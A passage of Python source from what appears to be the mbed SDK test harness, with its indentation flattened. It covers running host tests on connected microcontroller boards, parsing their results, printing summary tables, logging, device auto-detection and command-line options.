# Tests can be looped so test results must be stored for the same test
test_all_result = []
# Test results for one test ran few times
detailed_test_results = {} # { Loop_number: { results ... } }
for test_index in range(test_loops):
# If mbedls is available and we are auto detecting MUT info,
# update MUT info (mounting may have changed)
if get_module_avail('mbed_lstools') and self.opts_auto_detect:
platform_name_filter = [mcu]
muts_list = {}
found = False
for i in range(0, 60):
print('Looking for %s with MBEDLS' % mcu)
muts_list = get_autodetected_MUTS_list(platform_name_filter=platform_name_filter)
if 1 not in muts_list:
sleep(3)
else:
found = True
break
if not found:
print("Error: mbed not found with MBEDLS: %s" % data['mcu'])
return None
else:
mut = muts_list[1]
disk = mut.get('disk')
port = mut.get('port')
if disk is None or port is None:
return None
target_by_mcu = TARGET_MAP[mut['mcu']]
target_name_unique = mut['mcu_unique'] if 'mcu_unique' in mut else mut['mcu']
# Some extra stuff can be declared in MUTs structure
reset_type = mut.get('reset_type') # reboot.txt, reset.txt, shutdown.txt
reset_tout = mut.get('reset_tout') # COPY_IMAGE -> RESET_PROC -> SLEEP(RESET_TOUT)
# When the build and test system were separate, this was relative to a
# base network folder base path: join(NETWORK_BASE_PATH, )
image_path = image
# Host test execution
start_host_exec_time = time()
single_test_result = self.TEST_RESULT_UNDEF # single test run result
_copy_method = selected_copy_method
if not exists(image_path):
single_test_result = self.TEST_RESULT_NO_IMAGE
elapsed_time = 0
single_test_output = self.logger.log_line(self.logger.LogType.ERROR, 'Image file does not exist: %s'% image_path)
print(single_test_output)
else:
# Host test execution
start_host_exec_time = time()
host_test_verbose = self.opts_verbose_test_result_only or self.opts_verbose
host_test_reset = self.opts_mut_reset_type if reset_type is None else reset_type
host_test_result = self.run_host_test(test.host_test,
image_path, disk, port, duration,
micro=target_name,
verbose=host_test_verbose,
reset=host_test_reset,
reset_tout=reset_tout,
copy_method=selected_copy_method,
program_cycle_s=target_by_mcu.program_cycle_s)
single_test_result, single_test_output, single_testduration, single_timeout = host_test_result
# Store test result
test_all_result.append(single_test_result)
total_elapsed_time = time() - start_host_exec_time # Test time with copy (flashing) / reset
elapsed_time = single_testduration # Time of single test case execution after reset
detailed_test_results[test_index] = {
'result' : single_test_result,
'output' : single_test_output,
'target_name' : target_name,
'target_name_unique' : target_name_unique,
'toolchain_name' : toolchain_name,
'id' : test_id,
'description' : test_description,
'elapsed_time' : round(elapsed_time, 2),
'duration' : single_timeout,
'copy_method' : _copy_method,
}
print(self.print_test_result(
single_test_result, target_name_unique, toolchain_name, test_id,
test_description, elapsed_time, single_timeout))
# Update database entries for ongoing test
if self.db_logger and self.db_logger.is_connected():
test_type = 'SingleTest'
self.db_logger.insert_test_entry(self.db_logger_build_id,
target_name,
toolchain_name,
test_type,
test_id,
single_test_result,
single_test_output,
elapsed_time,
single_timeout,
test_index)
# In waterfall mode we keep testing until we get an OK result, then stop
if self.opts_waterfall_test and single_test_result == self.TEST_RESULT_OK:
break
if self.db_logger:
self.db_logger.disconnect()
return (self.shape_global_test_loop_result(test_all_result, self.opts_waterfall_test and self.opts_consolidate_waterfall_test),
target_name_unique,
toolchain_name,
test_id,
test_description,
round(elapsed_time, 2),
single_timeout,
self.shape_test_loop_ok_result_count(test_all_result)), detailed_test_results
def handle(self, test_spec, target_name, toolchain_name, test_loops=1):
""" Function determines MUT's mbed disk/port and copies binary to
target.
"""
handle_results = []
data = json.loads(test_spec)
# Find a suitable MUT:
mut = None
for id, m in self.muts.items():
if m['mcu'] == data['mcu']:
mut = m
handle_result = self.handle_mut(mut, data, target_name, toolchain_name, test_loops=test_loops)
handle_results.append(handle_result)
return handle_results
def print_test_result(self, test_result, target_name, toolchain_name,
test_id, test_description, elapsed_time, duration):
""" Use specific convention to print test result and related data
"""
tokens = []
tokens.append("TargetTest")
tokens.append(target_name)
tokens.append(toolchain_name)
tokens.append(test_id)
tokens.append(test_description)
separator = "::"
time_info = " in %.2f of %d sec" % (round(elapsed_time, 2), duration)
result = separator.join(tokens) + " [" + test_result +"]" + time_info
return Fore.MAGENTA + result + Fore.RESET
def shape_test_loop_ok_result_count(self, test_all_result):
""" Reformats list of results to simple string
"""
test_loop_count = len(test_all_result)
test_loop_ok_result = test_all_result.count(self.TEST_RESULT_OK)
return "%d/%d"% (test_loop_ok_result, test_loop_count)
def shape_global_test_loop_result(self, test_all_result, waterfall_and_consolidate):
""" Reformats list of results to simple string
"""
result = self.TEST_RESULT_FAIL
if all(test_all_result[0] == res for res in test_all_result):
result = test_all_result[0]
elif waterfall_and_consolidate and any(res == self.TEST_RESULT_OK for res in test_all_result):
result = self.TEST_RESULT_OK
return result
def run_host_test(self, name, image_path, disk, port, duration,
micro=None, reset=None, reset_tout=None,
verbose=False, copy_method=None, program_cycle_s=None):
""" Function creates new process with host test configured with particular test case.
Function also is pooling for serial port activity from process to catch all data
printed by test runner and host test during test execution
"""
def get_char_from_queue(obs):
""" Get character from queue safe way
"""
try:
c = obs.queue.get(block=True, timeout=0.5)
except Empty:
c = None
return c
def filter_queue_char(c):
""" Filters out non ASCII characters from serial port
"""
if ord(c) not in range(128):
c = ' '
return c
def get_test_result(output):
""" Parse test 'output' data
"""
result = self.TEST_RESULT_TIMEOUT
for line in "".join(output).splitlines():
search_result = self.RE_DETECT_TESTCASE_RESULT.search(line)
if search_result and len(search_result.groups()):
result = self.TEST_RESULT_MAPPING[search_result.groups(0)[0]]
break
return result
def get_auto_property_value(property_name, line):
""" Scans auto detection line from MUT and returns scanned parameter 'property_name'
Returns string
"""
result = None
if re.search("HOST: Property '%s'"% property_name, line) is not None:
property = re.search("HOST: Property '%s' = '([\w\d _]+)'"% property_name, line)
if property is not None and len(property.groups()) == 1:
result = property.groups()[0]
return result
cmd = ["python",
'%s.py'% name,
'-d', disk,
'-f', '"%s"'% image_path,
'-p', port,
'-t', str(duration),
'-C', str(program_cycle_s)]
if get_module_avail('mbed_lstools') and self.opts_auto_detect:
cmd += ['--auto']
# Add extra parameters to host_test
if copy_method is not None:
cmd += ["-c", copy_method]
if micro is not None:
cmd += ["-m", micro]
if reset is not None:
cmd += ["-r", reset]
if reset_tout is not None:
cmd += ["-R", str(reset_tout)]
if verbose:
print(Fore.MAGENTA + "Executing '" + " ".join(cmd) + "'" + Fore.RESET)
print("Test::Output::Start")
proc = Popen(cmd, stdout=PIPE, cwd=HOST_TESTS)
obs = ProcessObserver(proc)
update_once_flag = {} # Stores flags checking if some auto-parameter was already set
line = ''
output = []
start_time = time()
while (time() - start_time) < (2 * duration):
c = get_char_from_queue(obs)
if c:
if verbose:
sys.stdout.write(c)
c = filter_queue_char(c)
output.append(c)
# Give the mbed under test a way to communicate the end of the test
if c in ['\n', '\r']:
# Checking for auto-detection information from the test about MUT reset moment
if 'reset_target' not in update_once_flag and "HOST: Reset target..." in line:
# We will update this marker only once to prevent multiple time resets
update_once_flag['reset_target'] = True
start_time = time()
# Checking for auto-detection information from the test about timeout
auto_timeout_val = get_auto_property_value('timeout', line)
if 'timeout' not in update_once_flag and auto_timeout_val is not None:
# We will update this marker only once to prevent multiple time resets
update_once_flag['timeout'] = True
duration = int(auto_timeout_val)
# Detect mbed assert:
if 'mbed assertation failed: ' in line:
output.append('{{mbed_assert}}')
break
# Check for test end
if '{end}' in line:
break
line = ''
else:
line += c
end_time = time()
testcase_duration = end_time - start_time # Test case duration from reset to {end}
c = get_char_from_queue(obs)
if c:
if verbose:
sys.stdout.write(c)
c = filter_queue_char(c)
output.append(c)
if verbose:
print("Test::Output::Finish")
# Stop test process
obs.stop()
result = get_test_result(output)
return (result, "".join(output), testcase_duration, duration)
def is_peripherals_available(self, target_mcu_name, peripherals=None):
""" Checks if specified target should run specific peripheral test case defined in MUTs file
"""
if peripherals is not None:
peripherals = set(peripherals)
for id, mut in self.muts.items():
# Target MCU name check
if mut["mcu"] != target_mcu_name:
continue
# Peripherals check
if peripherals is not None:
if 'peripherals' not in mut:
continue
if not peripherals.issubset(set(mut['peripherals'])):
continue
return True
return False
def shape_test_request(self, mcu, image_path, test_id, duration=10):
""" Function prepares JSON structure describing test specification
"""
test_spec = {
"mcu": mcu,
"image": image_path,
"duration": duration,
"test_id": test_id,
}
return json.dumps(test_spec)
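# Example (illustrative, not original code):
#     shape_test_request('LPC1768', '/tmp/test.bin', 'MBED_10', 20)
# returns the JSON string
#     '{"mcu": "LPC1768", "image": "/tmp/test.bin", "duration": 20, "test_id": "MBED_10"}'
# (key order may differ), which handle() later parses back with json.loads().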
def get_unique_value_from_summary(test_summary, index):
""" Gets list of unique target names
"""
result = []
for test in test_summary:
target_name = test[index]
if target_name not in result:
result.append(target_name)
return sorted(result)
def get_unique_value_from_summary_ext(test_summary, index_key, index_val):
""" Gets list of unique target names and return dictionary
"""
result = {}
for test in test_summary:
key = test[index_key]
val = test[index_val]
if key not in result:
result[key] = val
return result
def show_json_file_format_error(json_spec_filename, line, column):
""" Prints JSON broken content
"""
with open(json_spec_filename) as data_file:
line_no = 1
for json_line in data_file:
if line_no + 5 >= line: # Print last few lines before error
print('Line %d:\t'%line_no + json_line)
if line_no == line:
print('%s\t%s^' % (' ' * len('Line %d:' % line_no),
'-' * (column - 1)))
break
line_no += 1
def json_format_error_defect_pos(json_error_msg):
""" Gets first error line and column in JSON file format.
Parsed from exception thrown by json.loads() string
"""
result = None
line, column = 0, 0
# Line value search
line_search = re.search('line [0-9]+', json_error_msg)
if line_search is not None:
ls = line_search.group().split(' ')
if len(ls) == 2:
line = int(ls[1])
# Column position search
column_search = re.search('column [0-9]+', json_error_msg)
if column_search is not None:
cs = column_search.group().split(' ')
if len(cs) == 2:
column = int(cs[1])
result = [line, column]
return result
def get_json_data_from_file(json_spec_filename, verbose=False):
""" Loads from file JSON formatted string to data structure
"""
result = None
try:
with open(json_spec_filename) as data_file:
try:
result = json.load(data_file)
except ValueError as json_error_msg:
result = None
print('JSON file %s parsing failed. Reason: %s' %
(json_spec_filename, json_error_msg))
# We can print where error occurred inside JSON file if we can parse exception msg
json_format_defect_pos = json_format_error_defect_pos(str(json_error_msg))
if json_format_defect_pos is not None:
line = json_format_defect_pos[0]
column = json_format_defect_pos[1]
print()
show_json_file_format_error(json_spec_filename, line, column)
except IOError as fileopen_error_msg:
print('JSON file %s not opened. Reason: %s\n'%
(json_spec_filename, fileopen_error_msg))
if verbose and result:
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(result)
return result
def print_muts_configuration_from_json(json_data, join_delim=", ", platform_filter=None):
""" Prints MUTs configuration passed to test script for verboseness
"""
muts_info_cols = []
# We need to check all unique properties for each defined MUT
for k in json_data:
mut_info = json_data[k]
for mut_property in mut_info:
if mut_property not in muts_info_cols:
muts_info_cols.append(mut_property)
# Prepare pretty table object to display all MUTs
pt_cols = ["index"] + muts_info_cols
pt = PrettyTable(pt_cols)
for col in pt_cols:
pt.align[col] = "l"
# Add rows to pretty print object
for k in json_data:
row = [k]
mut_info = json_data[k]
add_row = True
if platform_filter and 'mcu' in mut_info:
add_row = re.search(platform_filter, mut_info['mcu']) is not None
if add_row:
for col in muts_info_cols:
cell_val = mut_info[col] if col in mut_info else None
if isinstance(cell_val, list):
cell_val = join_delim.join(cell_val)
row.append(cell_val)
pt.add_row(row)
return pt.get_string()
def print_test_configuration_from_json(json_data, join_delim=", "):
""" Prints test specification configuration passed to test script for verboseness
"""
toolchains_info_cols = []
# We need to check all toolchains for each device
for k in json_data:
# k should be 'targets'
targets = json_data[k]
for target in targets:
toolchains = targets[target]
for toolchain in toolchains:
if toolchain not in toolchains_info_cols:
toolchains_info_cols.append(toolchain)
# Prepare pretty table object to display test specification
pt_cols = ["mcu"] + sorted(toolchains_info_cols)
pt = PrettyTable(pt_cols)
for col in pt_cols:
pt.align[col] = "l"
# { target : [conflicted toolchains] }
toolchain_conflicts = {}
toolchain_path_conflicts = []
for k in json_data:
# k should be 'targets'
targets = json_data[k]
for target in targets:
target_supported_toolchains = get_target_supported_toolchains(target)
if not target_supported_toolchains:
target_supported_toolchains = []
target_name = target if target in TARGET_MAP else "%s*"% target
row = [target_name]
toolchains = targets[target]
for toolchain in sorted(toolchains_info_cols):
# Check for conflicts: target vs toolchain
conflict = False
conflict_path = False
if toolchain in toolchains:
if toolchain not in target_supported_toolchains:
conflict = True
if target not in toolchain_conflicts:
toolchain_conflicts[target] = []
toolchain_conflicts[target].append(toolchain)
# Add marker inside table about target usage / conflict
cell_val = 'Yes' if toolchain in toolchains else '-'
if conflict:
cell_val += '*'
# Check for conflicts: toolchain vs toolchain path
if toolchain in TOOLCHAIN_PATHS:
toolchain_path = TOOLCHAIN_PATHS[toolchain]
if not os.path.isdir(toolchain_path):
conflict_path = True
if toolchain not in toolchain_path_conflicts:
toolchain_path_conflicts.append(toolchain)
if conflict_path:
cell_val += '#'
row.append(cell_val)
pt.add_row(row)
# generate result string
result = pt.get_string() # Test specification table
if toolchain_conflicts or toolchain_path_conflicts:
result += "\n"
result += "Toolchain conflicts:\n"
for target in toolchain_conflicts:
if target not in TARGET_MAP:
result += "\t* Target %s unknown\n"% (target)
conflict_target_list = join_delim.join(toolchain_conflicts[target])
            suffix = 's' if len(toolchain_conflicts[target]) > 1 else ''
            result += "\t* Target %s does not support %s toolchain%s\n"% (target, conflict_target_list, suffix)
for toolchain in toolchain_path_conflicts:
# Let's check toolchain configuration
if toolchain in TOOLCHAIN_PATHS:
toolchain_path = TOOLCHAIN_PATHS[toolchain]
if not os.path.isdir(toolchain_path):
result += "\t# Toolchain %s path not found: %s\n"% (toolchain, toolchain_path)
return result
def get_avail_tests_summary_table(cols=None, result_summary=True, join_delim=',', platform_filter=None):
""" Generates table summary with all test cases and additional test cases
information using pretty print functionality. Allows test suite user to
see test cases
"""
# get all unique test ID prefixes
unique_test_id = []
for test in TESTS:
split = test['id'].split('_')[:-1]
test_id_prefix = '_'.join(split)
if test_id_prefix not in unique_test_id:
unique_test_id.append(test_id_prefix)
unique_test_id.sort()
counter_dict_test_id_types = dict((t, 0) for t in unique_test_id)
counter_dict_test_id_types_all = dict((t, 0) for t in unique_test_id)
test_properties = ['id',
'automated',
'description',
'peripherals',
'host_test',
'duration'] if cols is None else cols
# All tests status table print
pt = PrettyTable(test_properties)
for col in test_properties:
pt.align[col] = "l"
pt.align['duration'] = "r"
counter_all = 0
counter_automated = 0
pt.padding_width = 1 # One space between column edges and contents (default)
for test_id in sorted(TEST_MAP.keys()):
if platform_filter is not None:
            # Filter out platforms using regex
if re.search(platform_filter, test_id) is None:
continue
row = []
test = TEST_MAP[test_id]
split = test_id.split('_')[:-1]
test_id_prefix = '_'.join(split)
for col in test_properties:
col_value = test[col]
if isinstance(test[col], list):
col_value = join_delim.join(test[col])
            elif test[col] is None:
col_value = "-"
row.append(col_value)
        if test['automated'] is True:
counter_dict_test_id_types[test_id_prefix] += 1
counter_automated += 1
pt.add_row(row)
# Update counters
counter_all += 1
counter_dict_test_id_types_all[test_id_prefix] += 1
result = pt.get_string()
result += "\n\n"
if result_summary and not platform_filter:
# Automation result summary
test_id_cols = ['automated', 'all', 'percent [%]', 'progress']
pt = PrettyTable(test_id_cols)
pt.align['automated'] = "r"
pt.align['all'] = "r"
pt.align['percent [%]'] = "r"
percent_progress = round(100.0 * counter_automated / float(counter_all), 1)
str_progress = progress_bar(percent_progress, 75)
pt.add_row([counter_automated, counter_all, percent_progress, str_progress])
result += "Automation coverage:\n"
result += pt.get_string()
result += "\n\n"
# Test automation coverage table print
test_id_cols = ['id', 'automated', 'all', 'percent [%]', 'progress']
pt = PrettyTable(test_id_cols)
pt.align['id'] = "l"
pt.align['automated'] = "r"
pt.align['all'] = "r"
pt.align['percent [%]'] = "r"
for unique_id in unique_test_id:
# print "\t\t%s: %d / %d" % (unique_id, counter_dict_test_id_types[unique_id], counter_dict_test_id_types_all[unique_id])
percent_progress = round(100.0 * counter_dict_test_id_types[unique_id] / float(counter_dict_test_id_types_all[unique_id]), 1)
str_progress = progress_bar(percent_progress, 75)
row = [unique_id,
counter_dict_test_id_types[unique_id],
counter_dict_test_id_types_all[unique_id],
percent_progress,
"[" + str_progress + "]"]
pt.add_row(row)
result += "Test automation coverage:\n"
result += pt.get_string()
result += "\n\n"
return result
def progress_bar(percent_progress, saturation=0):
""" This function creates progress bar with optional simple saturation mark
"""
    step = int(percent_progress / 2)    # Scale percentage (0-100) down to a 50-character bar
str_progress = '#' * step + '.' * int(50 - step)
c = '!' if str_progress[38] == '.' else '|'
if saturation > 0:
        saturation = saturation // 2
str_progress = str_progress[:saturation] + c + str_progress[saturation:]
return str_progress
def singletest_in_cli_mode(single_test):
""" Runs SingleTestRunner object in CLI (Command line interface) mode
@return returns success code (0 == success) for building and running tests
"""
start = time()
# Execute tests depending on options and filter applied
test_summary, shuffle_seed, test_summary_ext, test_suite_properties_ext, build_report, build_properties = single_test.execute()
elapsed_time = time() - start
# Human readable summary
if not single_test.opts_suppress_summary:
# prints well-formed summary with results (SQL table like)
print(single_test.generate_test_summary(test_summary, shuffle_seed))
if single_test.opts_test_x_toolchain_summary:
# prints well-formed summary with results (SQL table like)
# table shows text x toolchain test result matrix
print(single_test.generate_test_summary_by_target(test_summary,
shuffle_seed))
print("Completed in %.2f sec" % elapsed_time)
    print()
# Write summary of the builds
print_report_exporter = ReportExporter(ResultExporterType.PRINT, package="build")
status = print_report_exporter.report(build_report)
# Store extra reports in files
if single_test.opts_report_html_file_name:
# Export results in form of HTML report to separate file
report_exporter = ReportExporter(ResultExporterType.HTML)
report_exporter.report_to_file(test_summary_ext, single_test.opts_report_html_file_name, test_suite_properties=test_suite_properties_ext)
if single_test.opts_report_junit_file_name:
# Export results in form of JUnit XML report to separate file
report_exporter = ReportExporter(ResultExporterType.JUNIT)
report_exporter.report_to_file(test_summary_ext, single_test.opts_report_junit_file_name, test_suite_properties=test_suite_properties_ext)
if single_test.opts_report_text_file_name:
# Export results in form of a text file
report_exporter = ReportExporter(ResultExporterType.TEXT)
report_exporter.report_to_file(test_summary_ext, single_test.opts_report_text_file_name, test_suite_properties=test_suite_properties_ext)
if single_test.opts_report_build_file_name:
        # Export build results as a JUnit XML report to a separate file
report_exporter = ReportExporter(ResultExporterType.JUNIT, package="build")
report_exporter.report_to_file(build_report, single_test.opts_report_build_file_name, test_suite_properties=build_properties)
# Returns True if no build failures of the test projects or their dependencies
return status
class TestLogger():
""" Super-class for logging and printing ongoing events for test suite pass
"""
def __init__(self, store_log=True):
""" We can control if logger actually stores log in memory
            or just handles all log entries immediately
"""
self.log = []
self.log_to_file = False
self.log_file_name = None
self.store_log = store_log
self.LogType = construct_enum(INFO='Info',
WARN='Warning',
NOTIF='Notification',
ERROR='Error',
EXCEPT='Exception')
self.LogToFileAttr = construct_enum(CREATE=1, # Create or overwrite existing log file
APPEND=2) # Append to existing log file
def log_line(self, LogType, log_line, timestamp=True, line_delim='\n'):
""" Log one line of text
"""
log_timestamp = time()
log_entry = {'log_type' : LogType,
'log_timestamp' : log_timestamp,
'log_line' : log_line,
'_future' : None
}
# Store log in memory
if self.store_log:
self.log.append(log_entry)
return log_entry
class CLITestLogger(TestLogger):
""" Logger used with CLI (Command line interface) test suite. Logs on screen and to file if needed
"""
def __init__(self, store_log=True, file_name=None):
TestLogger.__init__(self)
self.log_file_name = file_name
#self.TIMESTAMP_FORMAT = '%y-%m-%d %H:%M:%S' # Full date and time
self.TIMESTAMP_FORMAT = '%H:%M:%S' # Time only
def log_print(self, log_entry, timestamp=True):
""" Prints on screen formatted log entry
"""
ts = log_entry['log_timestamp']
timestamp_str = datetime.datetime.fromtimestamp(ts).strftime("[%s] "% self.TIMESTAMP_FORMAT) if timestamp else ''
log_line_str = "%(log_type)s: %(log_line)s"% (log_entry)
return timestamp_str + log_line_str
def log_line(self, LogType, log_line, timestamp=True, line_delim='\n'):
""" Logs line, if log file output was specified log line will be appended
at the end of log file
"""
log_entry = TestLogger.log_line(self, LogType, log_line)
log_line_str = self.log_print(log_entry, timestamp)
if self.log_file_name is not None:
try:
with open(self.log_file_name, 'a') as f:
f.write(log_line_str + line_delim)
except IOError:
pass
return log_line_str
def factory_db_logger(db_url):
""" Factory database driver depending on database type supplied in database connection string db_url
"""
if db_url is not None:
from tools.test_mysql import MySQLDBAccess
connection_info = BaseDBAccess().parse_db_connection_string(db_url)
if connection_info is not None:
(db_type, username, password, host, db_name) = BaseDBAccess().parse_db_connection_string(db_url)
if db_type == 'mysql':
return MySQLDBAccess()
return None
def detect_database_verbose(db_url):
""" uses verbose mode (prints) database detection sequence to check it database connection string is valid
"""
result = BaseDBAccess().parse_db_connection_string(db_url)
if result is not None:
# Parsing passed
(db_type, username, password, host, db_name) = result
#print "DB type '%s', user name '%s', password '%s', host '%s', db name '%s'"% result
# Let's try to connect
db_ = factory_db_logger(db_url)
if db_ is not None:
print("Connecting to database '%s'..." % db_url)
db_.connect(host, username, password, db_name)
if db_.is_connected():
print("ok")
print("Detecting database...")
print(db_.detect_database(verbose=True))
print("Disconnecting...")
db_.disconnect()
print("done")
else:
print("Database type '%s' unknown" % db_type)
else:
print("Parse error: '%s' - DB Url error" % db_url)
def get_module_avail(module_name):
""" This function returns True if module_name is already imported module
"""
return module_name in sys.modules.keys()
def get_autodetected_MUTS_list(platform_name_filter=None):
oldError = None
if os.name == 'nt':
# Disable Windows error box temporarily
oldError = ctypes.windll.kernel32.SetErrorMode(1) #note that SEM_FAILCRITICALERRORS = 1
mbeds = mbed_lstools.create()
detect_muts_list = mbeds.list_mbeds()
if os.name == 'nt':
ctypes.windll.kernel32.SetErrorMode(oldError)
return get_autodetected_MUTS(detect_muts_list, platform_name_filter=platform_name_filter)
def get_autodetected_MUTS(mbeds_list, platform_name_filter=None):
""" Function detects all connected to host mbed-enabled devices and generates artificial MUTS file.
If function fails to auto-detect devices it will return empty dictionary.
if get_module_avail('mbed_lstools'):
mbeds = mbed_lstools.create()
mbeds_list = mbeds.list_mbeds()
@param mbeds_list list of mbeds captured from mbed_lstools
        @param platform_name_filter Optional list of platform names used to filter the 'platform_name' of detected devices
"""
result = {} # Should be in muts_all.json format
# Align mbeds_list from mbed_lstools to MUT file format (JSON dictionary with muts)
# mbeds_list = [{'platform_name': 'NUCLEO_F302R8', 'mount_point': 'E:', 'target_id': '07050200623B61125D5EF72A', 'serial_port': u'COM34'}]
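    # A resulting entry built from the example record above would look like:
    # result[1] = {'mcu': 'NUCLEO_F302R8', 'mcu_unique': 'NUCLEO_F302R8[F72A]',
    #              'port': 'COM34', 'disk': 'E:', 'peripherals': []}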
index = 1
for mut in mbeds_list:
# Filter the MUTS if a filter is specified
if platform_name_filter and not mut['platform_name'] in platform_name_filter:
continue
        # For mcu_unique - we are assigning 'platform_name_unique' value from mbedls output (if it exists)
# if not we are creating our own unique value (last few chars from platform's target_id).
m = {'mcu': mut['platform_name'],
'mcu_unique' : mut['platform_name_unique'] if 'platform_name_unique' in mut else "%s[%s]" % (mut['platform_name'], mut['target_id'][-4:]),
'port': mut['serial_port'],
'disk': mut['mount_point'],
'peripherals': [] # No peripheral detection
}
        result[index] = m
index += 1
return result
def get_autodetected_TEST_SPEC(mbeds_list,
use_default_toolchain=True,
use_supported_toolchains=False,
toolchain_filter=None,
platform_name_filter=None):
""" Function detects all connected to host mbed-enabled devices and generates artificial test_spec file.
If function fails to auto-detect devices it will return empty 'targets' test_spec description.
use_default_toolchain - if True add default toolchain to test_spec
use_supported_toolchains - if True add all supported toolchains to test_spec
toolchain_filter - if [...list of toolchains...] add from all toolchains only those in filter to test_spec
"""
result = {'targets': {} }
for mut in mbeds_list:
mcu = mut['mcu']
if platform_name_filter is None or (platform_name_filter and mut['mcu'] in platform_name_filter):
if mcu in TARGET_MAP:
default_toolchain = TARGET_MAP[mcu].default_toolchain
supported_toolchains = TARGET_MAP[mcu].supported_toolchains
# Decide which toolchains should be added to test specification toolchain pool for each target
toolchains = []
if use_default_toolchain:
toolchains.append(default_toolchain)
if use_supported_toolchains:
toolchains += supported_toolchains
if toolchain_filter is not None:
all_toolchains = supported_toolchains + [default_toolchain]
for toolchain in toolchain_filter:
if toolchain in all_toolchains:
toolchains.append(toolchain)
result['targets'][mcu] = list(set(toolchains))
return result
def get_default_test_options_parser():
""" Get common test script options used by CLI, web services etc.
"""
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--tests',
dest='test_spec_filename',
metavar="FILE",
type=argparse_filestring_type,
help='Points to file with test specification')
parser.add_argument('-M', '--MUTS',
dest='muts_spec_filename',
metavar="FILE",
type=argparse_filestring_type,
help='Points to file with MUTs specification (overwrites settings.py and private_settings.py)')
parser.add_argument("-j", "--jobs",
dest='jobs',
metavar="NUMBER",
type=int,
help="Define number of compilation jobs. Default value is 1")
if get_module_avail('mbed_lstools'):
# Additional features available when mbed_lstools is installed on host and imported
# mbed_lstools allow users to detect connected to host mbed-enabled devices
parser.add_argument('--auto',
dest='auto_detect',
action="store_true",
help='Use mbed-ls module to detect all connected mbed devices')
toolchain_list = list(TOOLCHAINS) + ["DEFAULT", "ALL"]
parser.add_argument('--tc',
dest='toolchains_filter',
type=argparse_many(argparse_uppercase_type(toolchain_list, "toolchains")),
help="Toolchain filter for --auto argument. Use toolchains names separated by comma, 'default' or 'all' to select toolchains")
test_scopes = ','.join(["'%s'" % n for n in get_available_oper_test_scopes()])
parser.add_argument('--oper',
dest='operability_checks',
type=argparse_lowercase_type(get_available_oper_test_scopes(), "scopes"),
help='Perform interoperability tests between host and connected mbed devices. Available test scopes are: %s' % test_scopes)
parser.add_argument('--clean',
dest='clean',
action="store_true",
help='Clean the build directory')
parser.add_argument('-P', '--only-peripherals',
dest='test_only_peripheral',
default=False,
action="store_true",
help='Test only peripheral declared for MUT and skip common tests')
parser.add_argument("--profile", dest="profile", action="append",
type=argparse_filestring_type,
default=[])
parser.add_argument('-C', '--only-commons',
dest='test_only_common',
default=False,
action="store_true",
                        help='Test only board internals. Skip peripherals tests and perform common tests')
parser.add_argument('-n', '--test-by-names',
dest='test_by_names',
type=argparse_many(str),
                        help='Runs only tests enumerated in this switch. Use comma to separate test case names')
parser.add_argument('-p', '--peripheral-by-names',
dest='peripheral_by_names',
type=argparse_many(str),
help='Forces discovery of particular peripherals. Use comma to separate peripheral names')
copy_methods = host_tests_plugins.get_plugin_caps('CopyMethod')
copy_methods_str = "Plugin support: " + ', '.join(copy_methods)
parser.add_argument('-c', '--copy-method',
dest='copy_method',
type=argparse_uppercase_type(copy_methods, "flash method"),
help="Select binary copy (flash) method. Default is Python's shutil.copy() method. %s"% copy_methods_str)
reset_methods = host_tests_plugins.get_plugin_caps('ResetMethod')
reset_methods_str = "Plugin support: " + ', '.join(reset_methods)
parser.add_argument('-r', '--reset-type',
dest='mut_reset_type',
default=None,
type=argparse_uppercase_type(reset_methods, "reset method"),
help='Extra reset method used to reset MUT by host test script. %s'% reset_methods_str)
parser.add_argument('-g', '--goanna-for-tests',
dest='goanna_for_tests',
action="store_true",
                        help='Run Goanna static analysis tool for tests. (Project will be rebuilt)')
parser.add_argument('-G', '--goanna-for-sdk',
dest='goanna_for_mbed_sdk',
action="store_true",
                        help='Run Goanna static analysis tool for mbed SDK (Project will be rebuilt)')
parser.add_argument('-s', '--suppress-summary',
dest='suppress_summary',
default=False,
action="store_true",
                        help='Suppresses display of well-formatted table with test results')
parser.add_argument('-t', '--test-summary',
dest='test_x_toolchain_summary',
default=False,
action="store_true",
                        help='Displays well-formatted table with test x toolchain results per target')
parser.add_argument('-A', '--test-automation-report',
dest='test_automation_report',
default=False,
action="store_true",
help='Prints information about all tests and exits')
parser.add_argument('-R', '--test-case-report',
dest='test_case_report',
default=False,
action="store_true",
help='Prints information about all test cases and exits')
parser.add_argument("-S", "--supported-toolchains",
action="store_true",
dest="supported_toolchains",
default=False,
help="Displays supported matrix of MCUs and toolchains")
parser.add_argument("-O", "--only-build",
action="store_true",
dest="only_build_tests",
default=False,
help="Only build tests, skips actual test procedures (flashing etc.)")
parser.add_argument('--parallel',
dest='parallel_test_exec',
default=False,
action="store_true",
                        help='Experimental: executes test runners in parallel for MUTs connected to your host (speeds up test result collection)')
parser.add_argument('--config',
dest='verbose_test_configuration_only',
default=False,
action="store_true",
                        help='Displays full test specification and MUTs configuration and exits')
parser.add_argument('--loops',
dest='test_loops_list',
type=argparse_many(str),
help='Set no. of loops per test. Format: TEST_1=1,TEST_2=2,TEST_3=3')
parser.add_argument('--global-loops',
dest='test_global_loops_value',
type=int,
                        help='Set global number of test loops per test. Default value is 1')
parser.add_argument('--consolidate-waterfall',
dest='consolidate_waterfall_test',
default=False,
action="store_true",
help='Used with --waterfall argument. Adds only one test to report reflecting outcome of waterfall test.')
parser.add_argument('-W', '--waterfall',
dest='waterfall_test',
default=False,
action="store_true",
help='Used with --loops or --global-loops arguments. Tests until OK result occurs and assumes test passed')
parser.add_argument('-N', '--firmware-name',
dest='firmware_global_name',
                        help='Set global name for all produced projects. Note, proper file extension will be added by build scripts')
parser.add_argument('-u', '--shuffle',
dest='shuffle_test_order',
default=False,
action="store_true",
help='Shuffles test execution order')
parser.add_argument('--shuffle-seed',
dest='shuffle_test_seed',
default=None,
help='Shuffle seed (If you want to reproduce your shuffle order please use seed provided in test summary)')
parser.add_argument('-f', '--filter',
dest='general_filter_regex',
type=argparse_many(str),
default=None,
help='For some commands you can use filter to filter out results')
parser.add_argument('--inc-timeout',
dest='extend_test_timeout',
metavar="NUMBER",
type=int,
help='You can increase global timeout for each test by specifying additional test timeout in seconds')
parser.add_argument('--db',
dest='db_url',
help='This specifies what database test suite uses to store its state. To pass DB connection info use database connection string. Example: \'mysql://username:password@127.0.0.1/db_name\'')
parser.add_argument('-l', '--log',
dest='log_file_name',
help='Log events to external file (note not all console entries may be visible in log file)')
parser.add_argument('--report-html',
dest='report_html_file_name',
help='You can log test suite results in form of HTML report')
parser.add_argument('--report-junit',
